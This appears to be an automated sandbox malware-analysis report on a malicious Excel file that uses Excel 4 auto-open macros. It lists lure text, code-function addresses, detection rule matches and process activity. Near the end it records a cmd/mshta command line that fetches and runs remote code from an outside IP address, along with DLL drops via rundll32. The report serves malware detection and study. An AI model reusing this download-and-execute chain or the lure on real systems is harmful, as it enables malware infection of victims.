                            Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23
                            Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 ,, Previewing is not available for protected documents. L, 14
                            Source: Screenshot number: 8 Screenshot OCR: protected documents. L, 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to
                            Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23 24 25 26 27 28 2
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\Milossd.dll
                            Source: DOCUMENT_2801.xls Initial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BC30911_2_002BC309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CC38F11_2_002CC38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CB39111_2_002CB391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CD3C811_2_002CD3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C542E11_2_002C542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CA42911_2_002CA429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BB41A11_2_002BB41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D146E11_2_002D146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C04B811_2_002C04B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CE49811_2_002CE498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B44FA11_2_002B44FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C64F111_2_002C64F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C74DD11_2_002C74DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D04DE11_2_002D04DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C351211_2_002C3512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BF58F11_2_002BF58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C45CD11_2_002C45CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C363D11_2_002C363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C561F11_2_002C561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D367211_2_002D3672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B865011_2_002B8650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B472E11_2_002B472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B777B11_2_002B777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C275311_2_002C2753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BB82111_2_002BB821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B283011_2_002B2830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C183111_2_002C1831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BE86A11_2_002BE86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C686411_2_002C6864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D086711_2_002D0867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BC85011_2_002BC850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B88F411_2_002B88F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B68DE11_2_002B68DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CD8D711_2_002CD8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BF93D11_2_002BF93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B194C11_2_002B194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C094611_2_002C0946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B195011_2_002B1950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CC9A911_2_002CC9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C99AA11_2_002C99AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D199311_2_002D1993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B6A1F11_2_002B6A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B9A7D11_2_002B9A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BCA4311_2_002BCA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BAB6611_2_002BAB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BBB4B11_2_002BBB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D1B5411_2_002D1B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C4B5611_2_002C4B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B7B8211_2_002B7B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CEBFF11_2_002CEBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C2BF611_2_002C2BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C7BCA11_2_002C7BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B6C2911_2_002B6C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CCC8911_2_002CCC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BEC9B11_2_002BEC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CACD311_2_002CACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C0D3311_2_002C0D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BBD0F11_2_002BBD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C8D7111_2_002C8D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C3D4111_2_002C3D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D0D5B11_2_002D0D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BFD8C11_2_002BFD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B8D9511_2_002B8D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CBE8C11_2_002CBE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BAE9A11_2_002BAE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CEE9411_2_002CEE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B6ED611_2_002B6ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CFF3111_2_002CFF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B2FA111_2_002B2FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B3FB811_2_002B3FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B1F9B11_2_002B1F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002BCFCE11_2_002BCFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081548312_2_00815483
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082C08912_2_0082C089
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082B28C12_2_0082B28C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082E29412_2_0082E294
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081E09B12_2_0081E09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082D89812_2_0082D898
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081A29A12_2_0081A29A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082049E12_2_0082049E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082069C12_2_0082069C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081F8B812_2_0081F8B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082A0D312_2_0082A0D3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082CCD712_2_0082CCD7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008162D612_2_008162D6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082F8DE12_2_0082F8DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00815CDE12_2_00815CDE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008268DD12_2_008268DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008164ED12_2_008164ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008258F112_2_008258F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00817CF412_2_00817CF4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008138FA12_2_008138FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008250F912_2_008250F9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081A81A12_2_0081A81A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00824A1F12_2_00824A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00815E1F12_2_00815E1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081AC2112_2_0081AC21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081602912_2_00816029
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082982912_2_00829829
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082482E12_2_0082482E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00811C3012_2_00811C30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00820C3112_2_00820C31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00822A3D12_2_00822A3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081BE4312_2_0081BE43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082444012_2_00824440
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081D64312_2_0081D643
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081BC5012_2_0081BC50
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00817A5012_2_00817A50
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082FC6712_2_0082FC67
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00825C6412_2_00825C64
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081F66B12_2_0081F66B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081DC6A12_2_0081DC6A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0083086E12_2_0083086E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00832A7212_2_00832A72
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00818E7D12_2_00818E7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00816F8212_2_00816F82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082858612_2_00828586
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082B78F12_2_0082B78F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081F18C12_2_0081F18C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081E98F12_2_0081E98F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00830D9312_2_00830D93
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082A79112_2_0082A791
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081819512_2_00818195
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081139B12_2_0081139B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008123A112_2_008123A1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008235A712_2_008235A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00828DAA12_2_00828DAA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082BDA912_2_0082BDA9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008133B812_2_008133B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00826FCA12_2_00826FCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082C7C812_2_0082C7C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008239CD12_2_008239CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081C3CE12_2_0081C3CE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00821FF612_2_00821FF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082DFFF12_2_0082DFFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00818B0012_2_00818B00
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081B70912_2_0081B709
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081B10F12_2_0081B10F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082291212_2_00822912
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081851A12_2_0081851A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00813B2E12_2_00813B2E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082013312_2_00820133
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082F33112_2_0082F331
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081ED3D12_2_0081ED3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082314112_2_00823141
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081FD4612_2_0081FD46
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081AF4B12_2_0081AF4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00810D4C12_2_00810D4C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00810D5012_2_00810D50
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00821B5312_2_00821B53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082955612_2_00829556
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00823F5612_2_00823F56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081E55412_2_0081E554
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00830F5412_2_00830F54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0083015B12_2_0083015B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00819F6612_2_00819F66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082817112_2_00828171
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00816B7B12_2_00816B7B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00745CF912_2_00745CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007370ED12_2_007370ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007474DD12_2_007474DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074EE9412_2_0074EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073EC9B12_2_0073EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074E49812_2_0074E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074BE8C12_2_0074BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00751B5412_2_00751B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073F93D12_2_0073F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074351212_2_00743512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073970012_2_00739700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074B39112_2_0074B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00738D9512_2_00738D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0075367212_2_00753672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00739A7D12_2_00739A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074686412_2_00746864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0075086712_2_00750867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073E86A12_2_0073E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0075146E12_2_0075146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074026B12_2_0074026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073C85012_2_0073C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073865012_2_00738650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073CA4312_2_0073CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073E24312_2_0073E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074504012_2_00745040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073283012_2_00732830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074183112_2_00741831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074363D12_2_0074363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073B82112_2_0073B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00736C2912_2_00736C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074542E12_2_0074542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074A42912_2_0074A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073B41A12_2_0073B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074561F12_2_0074561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00736A1F12_2_00736A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007464F112_2_007464F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007388F412_2_007388F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007344FA12_2_007344FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074D8D712_2_0074D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00736ED612_2_00736ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074ACD312_2_0074ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007504DE12_2_007504DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007368DE12_2_007368DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007404B812_2_007404B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074129C12_2_0074129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073AE9A12_2_0073AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074109E12_2_0074109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073608312_2_00736083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074CC8912_2_0074CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00748D7112_2_00748D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073777B12_2_0073777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073AB6612_2_0073AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074A15612_2_0074A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00744B5612_2_00744B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073195012_2_00731950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073F15412_2_0073F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074275312_2_00742753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00750D5B12_2_00750D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074094612_2_00740946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00743D4112_2_00743D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073BB4B12_2_0073BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073194C12_2_0073194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074FF3112_2_0074FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00740D3312_2_00740D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073472E12_2_0073472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073911A12_2_0073911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073C30912_2_0073C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073BD0F12_2_0073BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00742BF612_2_00742BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074EBFF12_2_0074EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007445CD12_2_007445CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074D3C812_2_0074D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073CFCE12_2_0073CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00747BCA12_2_00747BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00733FB812_2_00733FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00732FA112_2_00732FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007441A712_2_007441A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074C9A912_2_0074C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007499AA12_2_007499AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0075199312_2_00751993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00731F9B12_2_00731F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00737B8212_2_00737B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074918612_2_00749186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074C38F12_2_0074C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073F58F12_2_0073F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073FD8C12_2_0073FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003600713_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1004105013_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003130F13_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100323E213_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003046013_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1004159213_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003E59F13_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003960C13_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100317E213_2_100317E2
                            Source: 36E8.tmp.0.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exe, Process Stats: CPU usage > 98%
                            Source: DOCUMENT_2801.xls, Macro extractor: Sheet name: Macro3
                            Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0029C67D DeleteService
                            Source: DOCUMENT_2801.xls, type: SAMPLE, Matched rule: SUSP_Excel4Macro_AutoOpen, date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPED, Matched rule: SUSP_Excel4Macro_AutoOpen, date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exe, File created: C:\Windows\SysWOW64\Hzcvqvi\
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 100359C1 appears 46 times
                            Source: DOCUMENT_2801.xls, OLE indicator, VBA macros: true
                            Source: DOCUMENT_2801.xls.0.dr, OLE indicator, VBA macros: true
                            Source: classification engine, Classification label: mal100.troj.expl.evad.winXLS@25/9@1/35
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
                            Source: DOCUMENT_2801.xls, OLE indicator, Workbook stream: true
                            Source: DOCUMENT_2801.xls.0.dr, OLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 11_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc
                            Source: DOCUMENT_2801.xls, ReversingLabs: Detection: 16%
                            Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html
